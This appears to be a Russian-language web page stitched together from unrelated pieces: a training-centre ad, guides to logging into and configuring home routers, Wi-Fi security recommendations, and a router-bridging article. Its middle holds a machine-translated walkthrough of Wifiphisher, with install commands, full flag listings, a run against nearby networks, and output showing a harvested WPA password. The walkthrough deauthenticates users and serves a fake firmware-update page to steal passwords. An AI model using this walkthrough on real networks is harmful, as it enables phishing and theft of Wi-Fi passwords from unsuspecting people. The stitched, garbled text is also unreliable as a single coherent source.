Мы принимаем к оплате:
«Подарочный сертификат» от нашего Учебного Центра – это лучший подарок для тех, кто Вам дорог! Оплате обучение и подарите Вашим родным и близким обучение по любому из курсов!!!
«Сертификат на повторное обучение» дает возможность повторно пройти обучение в нашем Учебном Центре со скидкой 1000 рублей!
А также:
Как войти в вай фай роутер
Как зайти в настройки роутера? Открываем страницу с настройками любого роутера
Если вы хотите самостоятельно настроить Wi-Fi роутер, сменить пароль, название своей беспроводной сети, или другие настройки, то в любом случае, вам сначала нужно будет зайти в настройки роутера. В панель управления, где можно будет задать нужные параметры. Сразу хочу сказать, что это совсем не сложно. Не важно, какая у вас модель роутера и какой производитель (Tp-Link, D-Link, Asus, Linksys, Zyxel, и т. д.), по этой инструкции вы сможете зайти в панель управления. Принцип работы всех роутеров практически одинаковый, а это значит, что доступ к настройкам мы можем получить по одной и той же инструкции. Да, там есть некоторые нюансы, мы их обязательно рассмотрим.
Роутер, это такое себе самостоятельное устройство, которое работает на своем программном обеспечении. И доступ к нему можно пучить только по сетевому кабелю (в большинстве случаев). У многих возникает вопрос, что же за диск идет в комплекте с роутером, драйвера? Нет, там не драйвера. Для роутера вообще не нужны драйвера. На диске как правило находится специальная утилита, с помощью которой можно провести быструю настройку маршрутизатора. Но, я бы советовал настраивать роутер через настройки, в которые можно зайти через браузер. И как я уже писал выше, сделать это очень просто.
Мы рассмотрим два способа: доступ к панели управления по сетевому кабелю, с компьютера, или ноутбука, и доступ к настройкам по Wi-Fi с мобильных устройств (или так же с компьютера). Я советую для этого дела использовать сетевой кабель и компьютер. Но, если такой возможности нет, то сменить какие-то настройки, или даже полностью настроить маршрутизатор можно и с телефона, планшета, или ноутбука по Wi-Fi. Если же вы хотите обновить прошивку, то по Wi-Fi этого делать нельзя.
Как зайти в настройки роутера с компьютера
Видел много статей, где описывают какие-то сложные действия, которые нужно выполнить с самого начала (проверка настроек сети, получение IP адреса роутера через командную строку). Это делать не нужно, по крайней мере пока. Сначала нужно попробовать зайти в настройки. Если не получится, то тогда уже будем смотреть возможные причины. Зачем забивать себе голову ненужной ерундой.
Подключаем компьютер к роутеру
Берем сетевой кабель, который как правило идет в комплекте с роутером (можно использовать свой кабель) и подключаем один конец в сетевой разъем вашего стационарного компьютера, или ноутбука. Фото для наглядности:
Второй конец сетевого кабеля подключаем к роутеру в один из 4 (как правило) LAN разъемов. Они желтые. Для примера:
Как правило, доступ к настройкам можно получить по адресу 192.168.1.1, или 192.168.0.1. Адрес конкретно вашего роутера и логин с паролем, которые понадобятся дальше, можно посмотреть на самом роутере. Обычно, они написаны снизу на наклейке. Так же там может быть указан адрес типа tplinkwifi.net. Для примера:
Роутер должен быть включен. Дальше на компьютере открываем любой браузер. Можно даже Internet Explorer, у меня Opera. Что бы зайти в настройки, нам в адресной строке браузера нужно написать IP-адрес роутера 192.168.1.1, или 192.168.0.1, и перейти по нему нажав кнопку Enter. Появится окно с запросом имени пользователя и пароля. Снова же, по умолчанию, как правило, используется admin и admin. Эту информацию вы так же можете увидеть снизу устройства.
Если вы меняли логин и пароль для входа в настройки (не путать с паролем на Wi-Fi сеть), то нужно указывать их. А если вы их забыли, то придется делать сброс настроек роутера (статья на примере Tp-Link), и настраивать его заново.Если вы не можете найти IP-адрес, логин и пароль своего роутера, то пробуйте перейти сначала по адресу 192.168.1.1, а затем по 192.168.0.1. Логин пробуйте admin, как и пароль. Еще, поле пароль попробуйте оставить пустым, или указать 1234.
Задали нужные параметры и нажимаем кнопку Вход в систему, или просто Вход, не важно. Само окно у вас может выглядеть иначе, это так же не важно.
Если все хорошо, то вы увидите настройки своего роутера.
Если нет, то сейчас постараемся выяснить в чем может быть проблема. Пролистайте страницу ниже.
Заходим в панель управления по Wi-Fi: с телефона, планшета, ноутбука
Если у вас например нет сетевого кабеля, или под рукой нет ни одного компьютера, а нужно зайти в настройки маршрутизатора, то можно использовать для этого подключение по Wi-Fi.
Один важный момент: при соединении по Wi-Fi, а не по сетевому кабелю, можно абсолютно так же внести какие-то настройки, или даже настроить новый маршрутизатор. Но, ни в коем случае не обновляйте программное обеспечение вашего маршрутизатора. Этим вы можете просто его сломать. Прошивайте только при подключении по кабелю. Инструкции для Tp-Link и для D-Link.В принципе, все делаем так же как я описывал выше, начиная с момента, когда запускаем браузер, переходим по IP-адресу роутера и т. д. Отличие только в том, что подключаемся мы к Wi-Fi сети роутера, который нам нужно настроить, а не по кабелю. Берем наш телефон, ноутбук, или планшет, и подключаем его к Wi-Fi (если он не подключен). Если вы например хотите подключится к новому роутеру, то есть будет иметь стандартное название, и будет незащищенной.
Я покажу на примере входа в панель управления с планшета. Точно так же, как и на компьютере, открываем любой браузер и переходим по IP вашего рутера (192.168.0.1, или 192.168.1.1). Указываем данные для входа.
Должны открыться настройки.
Вот и все, как видите, все очень просто. Если что-то не получается, задавайте вопросы в комментариях.
Не заходит в настройки: возможные причины и решения
Более подробно об этой проблеме я писал в статье Что делать, если не заходит в настройки роутера на 192.168.0.1 или 192.168.1.1?. Но, так как проблема, когда настройки роутера не открываются и не получается зайти на адрес 192.168.0.1 и 192.168.1.1 очень популярная, то думаю, что эта информация лишней точно не будет. Давайте рассмотрим самые популярные проблемы:
При попытке перейти на IP-адрес 192.168.0.1, или 192.168.1.1 появляется ошибка страница не доступа, или не удалось открыть страницу.
Это значит, что компьютер не может соединится с роутером. Не важно, по кабелю, или по Wi-Fi. В первую очередь проверьте, есть ли подключение. Посмотрите на панель уведомлений (в правом нижнем углу), на статус соединения. Если вы подключены по кабелю, то там должен быть нарисован компьютер, он может быть с желтым значком, это нормально. Если подключаетесь по Wi-Fi, то там должна быть просто белая сеть (уровень сети). Она так же может быть с желтым восклицательным значком.
Способы решения:
- Нужно проверить сетевые настройки на компьютере. Возможно, у вас там в настройках локальной сети (при подключению по кабелю), или беспроводной (подключение по Wi-Fi), заданы какие-то статические настройки IP, или других параметров. Нужно выставить автоматическое получение IP и DNS. Об этом я уже подробно писал в статье проверка настроек локальной и беспроводной сети в Windows.
- Если подключение по кабелю, то нужно попробовать заменить его. Уже не раз встречал случаи, когда проблема была именно в кабеле. Или подключитесь по Wi-Fi.
- Если у вас на компьютере есть Wi-Fi, а вы соединяетесь по кабелю, то нужно полностью отключить Wi-Fi. И наоборот при подключении по беспроводной сети, кабель отключаем.
- В случае, если ничего не помогает, делайте сброс настроек роутера к заводским, возможно, в нем заданы каике-то нестандартные настройки соединения.
- Так же, не нужно исключать поломку самого маршрутизатора. Бывает и такое.
Неверный логин/пароль. Или ничего не происходит после нажатия кнопки Войти.
Может быть и такая проблема. Перешли по адресу, появилось окно с запросом данных, вы их указали, но появляется ошибка, что неверно указаны данные для входа, или страница просто перезагружается.
Способы решения:
- Попробуйте разные варианты пары логин/пароль. Admin и admin, попробуйте оставить оба поля пустыми, или только пароль. Попробует указать пароль 1234.
- Попробуйте зайти с другого браузера.
- Скорее всего придется делать сброс настроек маршрутизатора (ссылку давал выше).
Послесловие
Есть очень много производителей, и еще больше моделей разных роутеров. И практически у каждого свои нюансы касательно настроек. Но, сам процесс входа в панель управления у всех практически одинаковый. Надеюсь, что эта инструкция помогла вам попасть в настройки своего роутера. Если возникли какие-то проблемы, пишите в комментариях, будем разбираться вместе.
Рекомендуемые настройки для маршрутизаторов и точек доступа Wi-Fi
WPA3 Personal для большей безопасности или WPA2 / WPA3 Transitional для совместимости со старыми устройствами
Параметр безопасности определяет тип аутентификации и шифрования, используемые вашим маршрутизатором, а также уровень защиты конфиденциальности данных, передаваемых по его сети. Какой бы уровень безопасности вы ни выбрали, всегда устанавливайте надежный пароль для подключения к сети.
- WPA3 Personal - это новейший и наиболее безопасный протокол, доступный в настоящее время для устройств Wi-Fi.Он работает со всеми устройствами, поддерживающими Wi-Fi 6 (802.11ax), и некоторыми более старыми устройствами.
- WPA2 / WPA3 Transitional - это смешанный режим, в котором используется WPA3 Personal с устройствами, поддерживающими этот протокол, при этом старые устройства могут использовать WPA2 Personal (AES) вместо этого.
- WPA2 Personal (AES) подходит, когда вы не можете использовать один из более безопасных режимов. В этом случае также выберите AES в качестве типа шифрования или шифрования, если он доступен.
Настоятельно не рекомендуется использовать настройки, отключающие безопасность, такие как «Нет», «Открыть» или «Незащищено».Отключение безопасности отключает аутентификацию и шифрование и позволяет любому присоединиться к вашей сети, получить доступ к ее общим ресурсам (включая принтеры, компьютеры и интеллектуальные устройства), использовать ваше интернет-соединение и контролировать данные, передаваемые через вашу сеть или интернет-соединение (включая веб-сайты, которые вы визит). Это риск, даже если безопасность временно отключена или для гостевой сети.
Не создавайте и не присоединяйтесь к сетям, которые используют устаревшие, устаревшие протоколы безопасности, такие как смешанный режим WPA / WPA2, WPA Personal, TKIP, Dynamic WEP (WEP с 802.1X), WEP Transitional Security Network, WEP Open или WEP Shared. Они больше не являются безопасными и снижают надежность и производительность сети. Устройства Apple показывают предупреждение системы безопасности при подключении к таким сетям.
.Как настроить основные беспроводные настройки беспроводного DSL-маршрутизатора TP-Link
Шаг 1 Откройте веб-браузер и введите IP-адрес устройства в адресной строке (по умолчанию 192.168.1.1). Нажмите Введите .
Шаг 2 Введите имя пользователя и пароль на странице входа, имя пользователя и пароль по умолчанию - admin , затем нажмите OK , чтобы войти в устройство.
Шаг 3 Щелкните Wireless-> Basic слева и затем настройте основные параметры беспроводной сети:
Включите «Включить беспроводную связь» и «Передача SSID»
Введите имя вашей беспроводной сети в поле SSID
Выберите правильный регион, который является вашей страной / регионом.
Шаг 4 Нажмите Сохранить / Применить , чтобы сохранить настройки. Иногда вам может потребоваться перезагрузить маршрутизатор, чтобы активировать эти настройки.
.Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo
В то время как взлом паролей и PIN-атаки установки WPS привлекают много внимания, атаки социальной инженерии - безусловно, самый быстрый способ получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не введут пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.
Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.
Незнание того, насколько надежен пароль, который вы атакуете, может расстраивать, потому что если вы потратите время и вычислительную мощность, необходимые для атаки по словарю или грубой силы, то это может показаться пустой тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.
Знает ли средний пользователь, как выглядит страница входа на его Wi-Fi роутер? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, все равно будет вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?
Вифифишер считает, что ответ - «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого двойника, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для включения обновления прошивки, что объясняется как причина, по которой Wi-Fi перестал работать.
Обновление прошивки от ада
Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.
Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которой может присоединиться любой. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.
После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно отнеслись к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства повторно подключаются к сети, теперь они более безопасны благодаря установленному обновлению.
Легкий доступ с помощью Bossy Update
Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите нацелиться.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что их маршрутизатор работает в неуказанном режиме обновления.
Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается на соответствие производителю маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.
Что вам понадобится
Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.
Слева направо, начиная сверху: Alfa AWUS036NH; Альфа AWUS051NH; TP-LINK TL-WN722N; Альфа AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Image by Kody / Null ByteПомимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.
Шаг 1. Установка Wifiphisher
Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.
~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте 'apt autoremove', чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.
Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:
~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install
Это должно установить Wifiphisher, который с этого момента вы можете начать, просто набрав имя программы в окне терминала.
Шаг 2. Просмотрите флаги Wifiphisher
У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, вы можете увидеть на его странице --help , что у него есть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.
~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее захваченный с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа меняла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.
Шаг 3. Подключите адаптер беспроводной сети
Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного мониторинга, если вы не сделаете этого сами.
Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N - 802.11n - 150 Мбит / с - 2,4 ГГц - 5 дБи Антенна
Шаг 4: Запуск сценария
Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавляю имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.
Чтобы запустить сценарий, я выполню следующую команду.
~ # wifiphisher -i wlan1
После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .
Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Группа исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ ——————————————————————————————————————————————————— ———————————————————————————————————————
Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.
Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.В этом шаблоне отображается страница Chrome «Ошибка подключения» и окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с использованием OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которая может использоваться для передачи полезных данных жертвам.
После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.
Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:
После того, как цель присоединится, всплывающее окно потребует ввести пароль.
Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.
Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой Близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html
Вот и все! Скрипт завершится и представит вам только что введенный пароль.
[*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Следите за нами: https://twitter.com/wifiphisher [+] Ставьте лайк: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие
Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застревают за этим ужасным медленным фальшивым экраном загрузки.
Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.
Изображение Kody / Null ByteНадеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.
Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux
Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную хакерскую карьеру с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.
Купить сейчас (90% скидка)>
Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты Kody / Null Byte .Подключение двух маршрутизаторов в одной сети: усиление Wi-Fi, общие ресурсы
Прочтите эту статью, чтобы узнать, как подключить два или более маршрутизатора к одной сети, как усилить сигнал сети Wi-Fi или создать еще одну точку доступа в рамках существующей сети . Мы рассмотрим два способа сделать это - с помощью кабеля или Wi-Fi.
Содержание:
Зачем объединять несколько маршрутизаторов в одну сеть?
В некоторых ситуациях одного маршрутизатора может быть недостаточно для построения сети или обеспечения высококачественного покрытия Wi-Fi.Это означает, что он может быть не в состоянии обеспечить желаемую зону покрытия Wi-Fi или может не иметь необходимого количества портов для устройств, подключенных к такой сети. Некоторые комнаты или помещения могут оказаться вне зоны действия сигнала Wi-Fi вашего роутера. Такая ситуация хорошо известна людям, которые занимались построением сети Wi-Fi в большом доме, квартире или офисе, состоящем из множества комнат. Если это произойдет, необходимо установить дополнительное оборудование, чтобы расширить сеть до желаемого покрытия.И это не так уж и сложно, как может показаться.
Это можно сделать несколькими способами, которые мы обсудим в этой статье:
- Первый вариант - это соединение двух и более маршрутизаторов с помощью кабеля. Вам придется проложить кабель от одного маршрутизатора к другому (-ым). Это не всегда удобно, но это наиболее стабильный и надежный способ их подключения. Если вам нужна стабильно работающая сеть с высокой скоростью для ряда устройств, маршрутизаторы должны использовать кабельное соединение.
- Второй вариант - подключение роутеров по Wi-Fi. В этом случае используется мостовое соединение (WDS) или режим репитера. По сути, они одинаковы, но эти настройки по-разному реализованы в роутерах разных производителей.
Итак, отправная точка. У нас есть основной маршрутизатор, подключенный к Интернету, и он транслирует сеть Wi-Fi. Нам нужно установить еще один роутер, например, в другой комнате или на другом этаже. Этот второй маршрутизатор как бы усилит сеть Wi-Fi, предоставляемую основным маршрутизатором, и поможет расширить ту же сеть, чтобы она покрывала более удаленные помещения.
Второй роутер можно подключить к основному роутеру с помощью кабеля или Wi-Fi.
Давайте подробнее рассмотрим оба метода подключения.
Как подключить роутеры по Wi-Fi?
Чаще всего роутеры подключаются по Wi-Fi, и это кажется естественным, так как экономит силы на прокладку кабелей и сверление отверстий в стенах.
В моем случае основным маршрутизатором является TP-link TL-WR841N. Он транслирует сеть Wi-Fi с названием hetmansoftware.
Имейте в виду, что маршрутизатор, к которому мы собираемся подключиться в режиме моста, уже должен быть настроен.То есть подключение к Интернету должно быть установлено и работать, а сеть Wi-Fi транслируется.
Существует специальная статья о том, как настроить маршрутизатор, и подробное видео-руководство, которое поможет вам сориентироваться в этом процессе. Вы можете просмотреть эти материалы для лучшего понимания.
